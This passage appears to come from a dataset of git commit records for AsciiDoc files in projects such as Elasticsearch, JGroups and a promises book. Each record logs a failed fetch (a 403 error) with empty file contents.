2016-10-17.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-17.adoc","new_file":"_posts\/2016-10-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25787eda684d6e4106a06442ab0a7c1d664a510b","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65830be651080ee5d285171b2f1108876878e8ba","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55759e9e5fbdf9775e72cf86cce82be1c16f60f8","subject":"Update javaee7-websocket-api-html5-en.adoc","message":"Update javaee7-websocket-api-html5-en.adoc","repos":"jthmiranda\/javaee7-websocket,jthmiranda\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,mgreau\/javaee7-websocket,mgreau\/javaee7-websocket","old_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"576c569a1778b4f6cfeb79399a161023e38e4acf","subject":"Add a of conduct from contributor-covenant.org","message":"Add a of conduct from contributor-covenant.org\n\nThis seems reasonable enough\n\nFixes #173\n","repos":"jamescway\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raelik\/jruby-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34c186d38f752b6520cc2c8f2bffe6ebf86e3aea","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d671639c7db6a775f6273769a79e4bb651ca6bf","subject":"Create en\/SUMMARY.adoc","message":"Create en\/SUMMARY.adoc","repos":"reyman\/mageo-documentation,reyman\/mageo-documentation,reyman\/mageo-documentation","old_file":"en\/SUMMARY.adoc","new_file":"en\/SUMMARY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reyman\/mageo-documentation.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"25516868fe6f9beae8f66aaf3aef777a27644ef8","subject":"TCorrecting api name (#24924)","message":"TCorrecting api name (#24924)\n\nAs per REST request signature for reroute, API has no underscore.","repos":"vroyer\/elasticassandra,vroyer\/elasticassandra,sneivandt\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,mjason3\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,nezirus\/elasticsearch,fred84\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,s1monw\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,umeshdangat\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,masaruh\/elasticsearch,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,shreejay\/elasticsearch,jimczi\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,vroyer\/elassandra,nknize\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,markwalkom\/elasticsearch,mjason3\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,strapdata\/elassandra,markwalkom\/elasticsearch,nezirus\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,nezirus\/elasticsearch,maddin2016\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,nezirus\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/cluster\/reroute.asciidoc","new_file":"docs\/reference\/cluster\/reroute.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b3956ac24c74637ef39e07035f4f1d48d37ff37","subject":"chore(Ch4): add deferred-promise to index","message":"chore(Ch4): add deferred-promise to index\n","repos":"sunfurong\/promise,liubin\/promises-book,purepennons\/promises-book,oToUC\/promises-book,liubin\/promises-book,genie88\/promises-book,azu\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,lidasong2014\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book,mzbac\/promises-book,azu\/promises-book,liubin\/promises-book,purepennons\/promises-book,cqricky\/promises-book,wenber\/promises-book,wangwei1237\/promises-book,azu\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,sunfurong\/promise,azu\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,charlenopires\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,dieface\/promises-book,sunfurong\/promise,wenber\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,liyunsheng\/promises-book,liyunsheng\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,wenber\/promises-book,liyunsheng\/promises-book","old_file":"Ch4_AdvancedPromises\/readme.adoc","new_file":"Ch4_AdvancedPromises\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0d1198bf1b099f58f3ce98f31d3fc13c93cd509","subject":"Delete README-original.adoc","message":"Delete README-original.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"README-original.adoc","new_file":"README-original.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71e277841f54127721279f8918445ee53e468eff","subject":"fixed \"has no volunteered\" typo","message":"fixed \"has no volunteered\" typo","repos":"slaskawi\/JGroups,ligzy\/JGroups,rpelisse\/JGroups,rhusar\/JGroups,belaban\/JGroups,vjuranek\/JGroups,pruivo\/JGroups,kedzie\/JGroups,Sanne\/JGroups,TarantulaTechnology\/JGroups,pruivo\/JGroups,dimbleby\/JGroups,deepnarsay\/JGroups,kedzie\/JGroups,vjuranek\/JGroups,rpelisse\/JGroups,pferraro\/JGroups,kedzie\/JGroups,danberindei\/JGroups,ligzy\/JGroups,pferraro\/JGroups,dimbleby\/JGroups,rhusar\/JGroups,Sanne\/JGroups,vjuranek\/JGroups,TarantulaTechnology\/JGroups,slaskawi\/JGroups,rpelisse\/JGroups,rhusar\/JGroups,belaban\/JGroups,dimbleby\/JGroups,Sanne\/JGroups,deepnarsay\/JGroups,ligzy\/JGroups,pferraro\/JGroups,pruivo\/JGroups,deepnarsay\/JGroups,danberindei\/JGroups,belaban\/JGroups,slaskawi\/JGroups,TarantulaTechnology\/JGroups,danberindei\/JGroups","old_file":"doc\/manual\/blocks.adoc","new_file":"doc\/manual\/blocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pferraro\/JGroups.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"47eda8822032cc354eb186e1c238ad391e1fb4c3","subject":"Link diff GitHub","message":"Link diff GitHub\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"L3\/Exercices not\u00e9s.adoc","new_file":"L3\/Exercices not\u00e9s.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f978974bc656e883814d9d97bc11314cf082b9fa","subject":"Docs: Remove s3 repository integ test documentation (#26005)","message":"Docs: Remove s3 repository integ test documentation (#26005)\n\nThe s3 repository plugin has \"third party\" integ tests which rely\r\non external service and configuration setup. These tests are really\r\ninternal verification of the plugin (and should be moved to real integ\r\ntests). Running them is not something a user should do, and the\r\ndocumentation has been out of date for all of 5.x. This commit removes\r\nthe docs, removing potential confusion for users.","repos":"scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,robin13\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,HonzaKral\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,masaruh\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,masaruh\/elasticsearch","old_file":"docs\/plugins\/repository-s3.asciidoc","new_file":"docs\/plugins\/repository-s3.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"907d98a990f1a7360ea0af979d7f821833801b21","subject":"Minor fixes in the rules of five\/zero","message":"Minor fixes in the rules of five\/zero\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d2099ec4dd6d436883e45931e41b5b24a46f504","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"82881ef99abfa8243aa167786f7ba5530ce6effe","subject":"[DOCS] Fix typo in \"Cluster Health\" part (#20864)","message":"[DOCS] Fix typo in \"Cluster Health\" part (#20864)\n\nReplace \"we can see and total of ...\" by \"we can see a total of ...\"","repos":"wuranbo\/elasticsearch,mortonsykes\/elasticsearch,njlawton\/elasticsearch,mohit\/elasticsearch,gmarz\/elasticsearch,GlenRSmith\/elasticsearch,IanvsPoplicola\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,mikemccand\/elasticsearch,fred84\/elasticsearch,obourgain\/elasticsearch,jimczi\/elasticsearch,obourgain\/elasticsearch,StefanGor\/elasticsearch,liweinan0423\/elasticsearch,rlugojr\/elasticsearch,elasticdog\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,MisterAndersen\/elasticsearch,MaineC\/elasticsearch,coding0011\/elasticsearch,henakamaMSFT\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,yanjunh\/elasticsearch,nilabhsagar\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,a2lin\/elasticsearch,mikemccand\/elasticsearch,JervyShi\/elasticsearch,Shepard1212\/elasticsearch,sneivandt\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,elasticdog\/elasticsearch,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,IanvsPoplicola\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,LewayneNaidoo\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,mortonsykes\/elasticsearch,uschindler\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,MisterAndersen\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,umeshdangat\/elasticsearch,a2lin\/elasticsearch,liweinan0423\/elasticsearch,nilabhsagar\/elasticsearch,nazarewk\/elasticsearch,henakamaMSFT\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,rlugojr\/elasticsearch,henakamaMSFT\/elasticsearch,obourgain\/elasticsearch,GlenRSmith\/elasticsearch,artnowo\/elasticsearch,nazarewk\/elasticsearch,mortonsykes\/elasticsearch,jprante\/elasticsearch,yanjunh\/elasticsearch,geidies\/elasticsearch,liweinan0423\/elasticsearch,nezirus\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,winstonewert\/elasticsearch,C-Bish\/elasticsearch,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,IanvsPoplicola\/elasticsearch,qwerty4030\/elasticsearch,mjason3\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,mortonsykes\/elasticsearch,glefloch\/elasticsearch,lks21c\/elasticsearch,rlugojr\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,JSCooke\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,LewayneNaidoo\/elasticsearch,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,Shepard1212\/elasticsearch,rajanm\/elasticsearch,LewayneNaidoo\/elasticsearch,sneivandt\/elasticsearch,JackyMai\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,StefanGor\/elasticsearch,geidies\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,elasticdog\/elasticsearch,spiegela\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,fred84\/elasticsearch,bawse\/elasticsearch,nezirus\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,nilabhsagar\/elasticsearch,LeoYao\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,mjason3\/elasticsearch,i-am-Nathan\/elasticsearch,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,LeoYao\/elasticsearch,Stacey-Gammon\/elasticsearch,jprante\/elasticsearch,winstonewert\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,i-am-Nathan\/elasticsearch,glefloch\/elasticsearch,jimczi\/elasticsearch,JackyMai\/elasticsearch,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,gmarz\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,lks21c\/elasticsearch,i-am-Nathan\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,MaineC\/elasticsearch,JervyShi\/elasticsearch,fforbeck\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,njlawton\/elasticsearch,mortonsykes\/elasticsearch,geidies\/elasticsearch,obourgain\/elasticsearch,qwerty4030\/elasticsearch,JackyMai\/elasticsearch,njlawton\/elasticsearch,obourgain\/elasticsearch,s1monw\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,StefanGor\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,spiegela\/elasticsearch,umeshdangat\/elasticsearch,MaineC\/elasticsearch,kalimatas\/elasticsearch,mikemccand\/elasticsearch,vroyer\/elasticassandra,shreejay\/elasticsearch,nilabhsagar\/elasticsearch,brandonkearby\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,StefanGor\/elasticsearch,glefloch\/elasticsearch,mjason3\/elasticsearch,wuranbo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,gmarz\/elasticsearch,vroyer\/elassandra,nazarewk\/elasticsearch,fforbeck\/elasticsearch,kalimatas\/elasticsearch,a2lin\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,nazarewk\/elasticsearch,jprante\/elasticsearch,masaruh\/elasticsearch,wangtuo\/elasticsearch,MaineC\/elasticsearch,fforbeck\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,jprante\/elasticsearch,maddin2016\/elasticsearch,gmarz\/elasticsearch,shreejay\/elasticsearch,wangtuo\/elasticsearch,liweinan0423\/elasticsearch,JackyMai\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,fernandozhu\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,umeshdangat\/elasticsearch,alexshadow007\/elasticsearch,yanjunh\/elasticsearch,Shepard1212\/elasticsearch,scorpionvicky\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra,artnowo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elasticassandra,uschindler\/elasticsearch,vroyer\/elassandra,a2lin\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,elasticdog\/elasticsearch,gfyoung\/elasticsearch,fernandozhu\/elasticsearch,JervyShi\/elasticsearch,wuranbo\/elasticsearch,ZTE-PaaS\/elasticsearch,henakamaMSFT\/elasticsearch,fred84\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,JSCooke\/elasticsearch,nazarewk\/elasticsearch,yanjunh\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,Shepard1212\/elasticsearch,wuranbo\/elasticsearch,C-Bish\/elasticsearch,kalimatas\/elasticsearch,IanvsPoplicola\/elasticsearch,fred84\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch,spiegela\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,bawse\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,wuranbo\/elasticsearch,nezirus\/elasticsearch,glefloch\/elasticsearch,fernandozhu\/elasticsearch,JervyShi\/elasticsearch,elasticdog\/elasticsearch,qwerty4030\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,artnowo\/elasticsearch,GlenRSmith\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,pozhidaevak\/elasticsearch,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,JackyMai\/elasticsearch,MisterAndersen\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,coding0011\/elasticsearch,njlawton\/elasticsearch,geidies\/elasticsearch,liweinan0423\/elasticsearch,strapdata\/elassandra,pozhidaevak\/elasticsearch,mohit\/elasticsearch,Helen-Zhao\/elasticsearch,pozhidaevak\/elasticsearch,